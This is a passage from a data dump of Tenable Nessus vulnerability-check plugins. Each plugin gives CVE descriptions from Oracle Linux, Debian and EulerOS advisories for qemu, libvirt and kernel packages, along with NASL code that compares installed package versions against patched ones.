ABI (Liam Merwick) \n[Orabug: 29796676]\n- pvh: Add x86/HVM direct boot ABI header file (Liam Merwick) [Orabug: \n29796676]\n- elf-ops.h: Add get_elf_note_type() (Liam Merwick) [Orabug: 29796676]\n- elf: Add optional function ptr to load_elf() to parse ELF notes (Liam \nMerwick) [Orabug: 29796676]", "modified": "2019-11-02T00:00:00", "id": "ORACLELINUX_ELSA-2019-4713.NASL", "href": "https://www.tenable.com/plugins/nessus/126673", "published": "2019-07-15T00:00:00", "title": "Oracle Linux 7 : qemu (ELSA-2019-4713) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2019-4713.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126673);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/09/27 13:00:40\");\n\n script_cve_id(\"CVE-2017-5931\", \"CVE-2017-6058\", \"CVE-2017-9524\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2018-20123\", \"CVE-2019-11091\", \"CVE-2019-12155\");\n\n script_name(english:\"Oracle Linux 7 : qemu (ELSA-2019-4713) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[15:3.1.0-5.el7]\n- Only enable the halt poll control MSR if it is supported by the host (Mark\nKanda) [Orabug: 29946722]\n\n[15:3.1.0-4.el7]\n- kvm: i386: halt poll control MSR support (Marcelo Tosatti) [Orabug: \n29933278]\n- Document CVEs as fixed: CVE-2017-9524, CVE-2017-6058, CVE-2017-5931 \n(Mark Kanda) [Orabug: 29886908] {CVE-2017-5931} {CVE-2017-6058} \n{CVE-2017-9524}\n- pvrdma: release device resources in case of an error (Prasad J Pandit) \n[Orabug: 29056678] {CVE-2018-20123}\n- qxl: check release info object (Prasad J Pandit) [Orabug: 29886906] \n{CVE-2019-12155}\n- target/i386: add MDS-NO feature (Paolo Bonzini) [Orabug: 29820428] \n{CVE-2018-12126} {CVE-2018-12127} {CVE-2018-12130} {CVE-2019-11091}\n- docs: recommend use of md-clear feature on all Intel CPUs (Daniel P. \nBerrang&eacute ) [Orabug: 29820428] {CVE-2018-12126} {CVE-2018-12127} \n{CVE-2018-12130} {CVE-2019-11091}\n- target/i386: define md-clear bit (Paolo Bonzini) [Orabug: 29820428] \n{CVE-2018-12126} {CVE-2018-12127} {CVE-2018-12130} {CVE-2019-11091}\n- pvh: block migration if booting using PVH (Liam Merwick) [Orabug: \n29796676]\n- hw/i386/pc: run the multiboot loader before the PVH loader (Stefano \nGarzarella) [Orabug: 29796676]\n- optionrom/pvh: load initrd from fw_cfg (Stefano Garzarella) [Orabug: \n29796676]\n- hw/i386/pc: use PVH option rom (Stefano Garzarella) [Orabug: 29796676]\n- qemu.spec: add pvh.bin to %files (Liam Merwick) [Orabug: 29796676]\n- optionrom: add new PVH option rom (Stefano Garzarella) [Orabug: 29796676]\n- linuxboot_dma: move common functions in a new header (Stefano \nGarzarella) [Orabug: 29796676]\n- linuxboot_dma: remove duplicate definitions of FW_CFG (Stefano \nGarzarella) [Orabug: 29796676]\n- pvh: load initrd and expose it through fw_cfg (Stefano Garzarella) \n[Orabug: 29796676]\n- pvh: Boot uncompressed kernel using direct boot ABI (Liam Merwick) \n[Orabug: 29796676]\n- pvh: Add x86/HVM direct boot ABI header file (Liam Merwick) [Orabug: \n29796676]\n- elf-ops.h: Add get_elf_note_type() (Liam Merwick) [Orabug: 29796676]\n- elf: Add optional function ptr to load_elf() to parse ELF notes (Liam \nMerwick) [Orabug: 29796676]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2019-July/008891.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected qemu packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-block-gluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-block-iscsi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-block-rbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-img\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-kvm-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-system-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-system-x86-core\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-block-gluster-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-block-iscsi-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-block-rbd-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-common-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-img-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-kvm-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-kvm-core-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-system-x86-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-system-x86-core-3.1.0-5.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu / qemu-block-gluster / qemu-block-iscsi / qemu-block-rbd / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:24:46", "bulletinFamily": "scanner", "description": "Two vulnerabilities were discovered in Libvirt, a virtualisation\nabstraction library, allowing an API client with read-only permissions\nto execute arbitrary commands via the virConnectGetDomainCapabilities\nAPI, or read or execute arbitrary files via the\nvirDomainSaveImageGetXMLDesc API.\n\nAdditionally the libvirt", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-4469.NASL", "href": "https://www.tenable.com/plugins/nessus/126128", "published": "2019-06-24T00:00:00", "title": "Debian DSA-4469-1 : libvirt - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4469. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126128);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/08/12 17:35:38\");\n\n script_cve_id(\"CVE-2019-10161\", \"CVE-2019-10167\");\n script_xref(name:\"DSA\", value:\"4469\");\n\n script_name(english:\"Debian DSA-4469-1 : libvirt - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two vulnerabilities were discovered in Libvirt, a virtualisation\nabstraction library, allowing an API client with read-only permissions\nto execute arbitrary commands via the virConnectGetDomainCapabilities\nAPI, or read or execute arbitrary files via the\nvirDomainSaveImageGetXMLDesc API.\n\nAdditionally the libvirt's cpu map was updated to make addressing\nCVE-2018-3639, CVE-2017-5753, CVE-2017-5715, CVE-2018-12126,\nCVE-2018-12127, CVE-2018-12130 and CVE-2019-11091 easier by supporting\nthe md-clear, ssbd, spec-ctrl and ibpb CPU features when picking CPU\nmodels without having to fall back to host-passthrough.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-5753\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-5715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-12126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-12127\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-12130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-11091\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/libvirt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/libvirt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4469\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libvirt packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 3.0.0-4+deb9u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libvirt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"libnss-libvirt\", reference:\"3.0.0-4+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libvirt-clients\", reference:\"3.0.0-4+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libvirt-daemon\", reference:\"3.0.0-4+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libvirt-daemon-system\", reference:\"3.0.0-4+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libvirt-dev\", reference:\"3.0.0-4+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libvirt-doc\", reference:\"3.0.0-4+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libvirt-sanlock\", reference:\"3.0.0-4+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libvirt0\", reference:\"3.0.0-4+deb9u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:07:34", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1586.NASL", "href": "https://www.tenable.com/plugins/nessus/125513", "published": "2019-05-29T00:00:00", "title": "EulerOS 2.0 SP2 : kernel (EulerOS-SA-2019-1586)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125513);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/06/27 13:33:26\");\n\n script_cve_id(\n \"CVE-2017-13168\",\n \"CVE-2018-10877\",\n \"CVE-2018-12126\",\n \"CVE-2018-12127\",\n \"CVE-2018-12130\",\n \"CVE-2018-16884\",\n \"CVE-2018-9422\",\n \"CVE-2018-9516\",\n \"CVE-2019-11091\",\n \"CVE-2019-11190\",\n \"CVE-2019-3874\",\n \"CVE-2019-6133\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : kernel (EulerOS-SA-2019-1586)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel's NFS41+\n subsystem. NFS41+ shares mounted in different network\n namespaces at the same time can make bc_svc_process()\n use wrong back-channel IDs and cause a use-after-free\n vulnerability. Thus a malicious container user can\n cause a host kernel memory corruption and a system\n panic. Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out.(CVE-2018-16884)\n\n - An elevation of privilege vulnerability in the kernel\n scsi driver. Product: Android. Versions: Android\n kernel. Android ID A-65023233.(CVE-2017-13168)\n\n - A flaw in the load_elf_binary() function in the Linux\n kernel allows a local attacker to leak the base address\n of .text and stack sections for setuid binaries and\n bypass ASLR because install_exec_creds() is called too\n late in this function.(CVE-2019-11190)\n\n - The SCTP socket buffer used by a userspace application\n is not accounted by the cgroups subsystem. An attacker\n can use this flaw to cause a denial of service\n attack.(CVE-2019-3874)\n\n - A flaw was found in the Linux kernel ext4 filesystem.\n An out-of-bound access is possible in the\n ext4_ext_drop_refs() function when operating on a\n crafted ext4 filesystem image.(CVE-2018-10877)\n\n - Non-optimized code for key handling of shared futexes\n was found in the Linux kernel in the form of unbounded\n contention time due to the page lock for real-time\n users. Before the fix, the page lock was an\n unnecessarily heavy lock for the futex path that\n protected too much. After the fix, the page lock is\n only required in a specific corner case.(CVE-2018-9422)\n\n - A flaw was found in the Linux kernel in the\n hid_debug_events_read() function in the\n drivers/hid/hid-debug.c file. A lack of the certain\n checks may allow a privileged user ('root') to achieve\n an out-of-bounds write and thus receiving user space\n buffer corruption.(CVE-2018-9516)\n\n - A vulnerability was found in polkit. When\n authentication is performed by a non-root user to\n perform an administrative task, the authentication is\n temporarily cached in such a way that a local attacker\n could impersonate the authorized process, thus gaining\n access to elevated privileges.(CVE-2019-6133)\n\n - A flaw was found in the implementation of the 'fill\n buffer', a mechanism used by modern CPUs when a\n cache-miss is made on L1 CPU cache. If an attacker can\n generate a load operation that would create a page\n fault, the execution will continue speculatively with\n incorrect data from the fill buffer while the data is\n fetched from higher level caches. This response time\n can be measured to infer data in the fill buffer.\n (CVE-2018-12130)\n\n - Modern Intel microprocessors implement hardware-level\n micro-optimizations to improve the performance of\n writing data back to CPU caches. The write operation is\n split into STA (STore Address) and STD (STore Data)\n sub-operations. These sub-operations allow the\n processor to hand-off address generation logic into\n these sub-operations for optimized writes. Both of\n these sub-operations write to a shared distributed\n processor structure called the 'processor store\n buffer'. As a result, an unprivileged attacker could\n use this flaw to read private data resident within the\n CPU's processor store buffer. (CVE-2018-12126)\n\n - Microprocessors use a 'load port' subcomponent to\n perform load operations from memory or IO. During a\n load operation, the load port receives data from the\n memory or IO subsystem and then provides the data to\n the CPU registers and operations in the CPU's\n pipelines. Stale load operations results are stored in\n the 'load port' table until overwritten by newer\n operations. Certain load-port operations triggered by\n an attacker can be used to reveal data about previous\n stale requests leaking data back to the attacker via a\n timing side-channel. (CVE-2018-12127)\n\n - Uncacheable memory on some microprocessors utilizing\n speculative execution may allow an authenticated user\n to potentially enable information disclosure via a side\n channel with local access. (CVE-2019-11091)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1586\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?78581b48\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-327.62.59.83.h154\",\n \"kernel-debug-3.10.0-327.62.59.83.h154\",\n \"kernel-debug-devel-3.10.0-327.62.59.83.h154\",\n \"kernel-debuginfo-3.10.0-327.62.59.83.h154\",\n \"kernel-debuginfo-common-x86_64-3.10.0-327.62.59.83.h154\",\n \"kernel-devel-3.10.0-327.62.59.83.h154\",\n \"kernel-headers-3.10.0-327.62.59.83.h154\",\n \"kernel-tools-3.10.0-327.62.59.83.h154\",\n \"kernel-tools-libs-3.10.0-327.62.59.83.h154\",\n \"perf-3.10.0-327.62.59.83.h154\",\n \"python-perf-3.10.0-327.62.59.83.h154\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:07:34", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel where the coredump\n implementation does not use locking or other mechanisms\n to prevent vma layout or vma flags changes while it\n runs. This allows local users to obtain sensitive\n information, cause a denial of service (DoS), or\n possibly have unspecified other impact by triggering a\n race condition with mmget_not_zero or get_task_mm\n calls.(CVE-2019-11599)\n\n - The Siemens R3964 line discipline driver in\n drivers/tty/n_r3964.c in the Linux kernel before 5.0.8\n has multiple race conditions.(CVE-2019-11486)\n\n - A race condition in perf_event_open() allows local\n attackers to leak sensitive data from setuid programs.\n As no relevant locks (in particular the\n cred_guard_mutex) are held during the\n ptrace_may_access() call, it is possible for the\n specified target task to perform an execve() syscall\n with setuid execution before perf_event_alloc()\n actually attaches to it, allowing an attacker to bypass\n the ptrace_may_access() check and the\n perf_event_exit_task(current) call that is performed in\n install_exec_creds() during privileged execve()\n calls.(CVE-2019-3901)\n\n - The atyfb_ioctl function in\n drivers/video/fbdev/aty/atyfb_base.c in the Linux\n kernel through 4.12.10 does not initialize a certain\n data structure, which allows local users to obtain\n sensitive information from kernel stack memory by\n reading locations associated with padding\n bytes.(CVE-2017-14156)\n\n - A flaw was found in the Linux kernel", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1588.NASL", "href": "https://www.tenable.com/plugins/nessus/125515", "published": "2019-05-29T00:00:00", "title": "EulerOS 2.0 SP5 : kernel (EulerOS-SA-2019-1588)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125515);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/06/27 13:33:26\");\n\n script_cve_id(\n \"CVE-2017-14156\",\n \"CVE-2018-10876\",\n \"CVE-2018-12126\",\n \"CVE-2018-12127\",\n \"CVE-2018-12130\",\n \"CVE-2019-11091\",\n \"CVE-2019-11486\",\n \"CVE-2019-11599\",\n \"CVE-2019-3901\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : kernel (EulerOS-SA-2019-1588)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel where the coredump\n implementation does not use locking or other mechanisms\n to prevent vma layout or vma flags changes while it\n runs. This allows local users to obtain sensitive\n information, cause a denial of service (DoS), or\n possibly have unspecified other impact by triggering a\n race condition with mmget_not_zero or get_task_mm\n calls.(CVE-2019-11599)\n\n - The Siemens R3964 line discipline driver in\n drivers/tty/n_r3964.c in the Linux kernel before 5.0.8\n has multiple race conditions.(CVE-2019-11486)\n\n - A race condition in perf_event_open() allows local\n attackers to leak sensitive data from setuid programs.\n As no relevant locks (in particular the\n cred_guard_mutex) are held during the\n ptrace_may_access() call, it is possible for the\n specified target task to perform an execve() syscall\n with setuid execution before perf_event_alloc()\n actually attaches to it, allowing an attacker to bypass\n the ptrace_may_access() check and the\n perf_event_exit_task(current) call that is performed in\n install_exec_creds() during privileged execve()\n calls.(CVE-2019-3901)\n\n - The atyfb_ioctl function in\n drivers/video/fbdev/aty/atyfb_base.c in the Linux\n kernel through 4.12.10 does not initialize a certain\n data structure, which allows local users to obtain\n sensitive information from kernel stack memory by\n reading locations associated with padding\n bytes.(CVE-2017-14156)\n\n - A flaw was found in the Linux kernel's ext4 filesystem\n code. A use-after-free is possible in\n ext4_ext_remove_space() function when mounting and\n operating a crafted ext4 image.(CVE-2018-10876)\n\n - A flaw was found in the implementation of the 'fill\n buffer', a mechanism used by modern CPUs when a\n cache-miss is made on L1 CPU cache. If an attacker can\n generate a load operation that would create a page\n fault, the execution will continue speculatively with\n incorrect data from the fill buffer while the data is\n fetched from higher level caches. This response time\n can be measured to infer data in the fill buffer.\n (CVE-2018-12130)\n\n - Modern Intel microprocessors implement hardware-level\n micro-optimizations to improve the performance of\n writing data back to CPU caches. The write operation is\n split into STA (STore Address) and STD (STore Data)\n sub-operations. These sub-operations allow the\n processor to hand-off address generation logic into\n these sub-operations for optimized writes. Both of\n these sub-operations write to a shared distributed\n processor structure called the 'processor store\n buffer'. As a result, an unprivileged attacker could\n use this flaw to read private data resident within the\n CPU's processor store buffer. 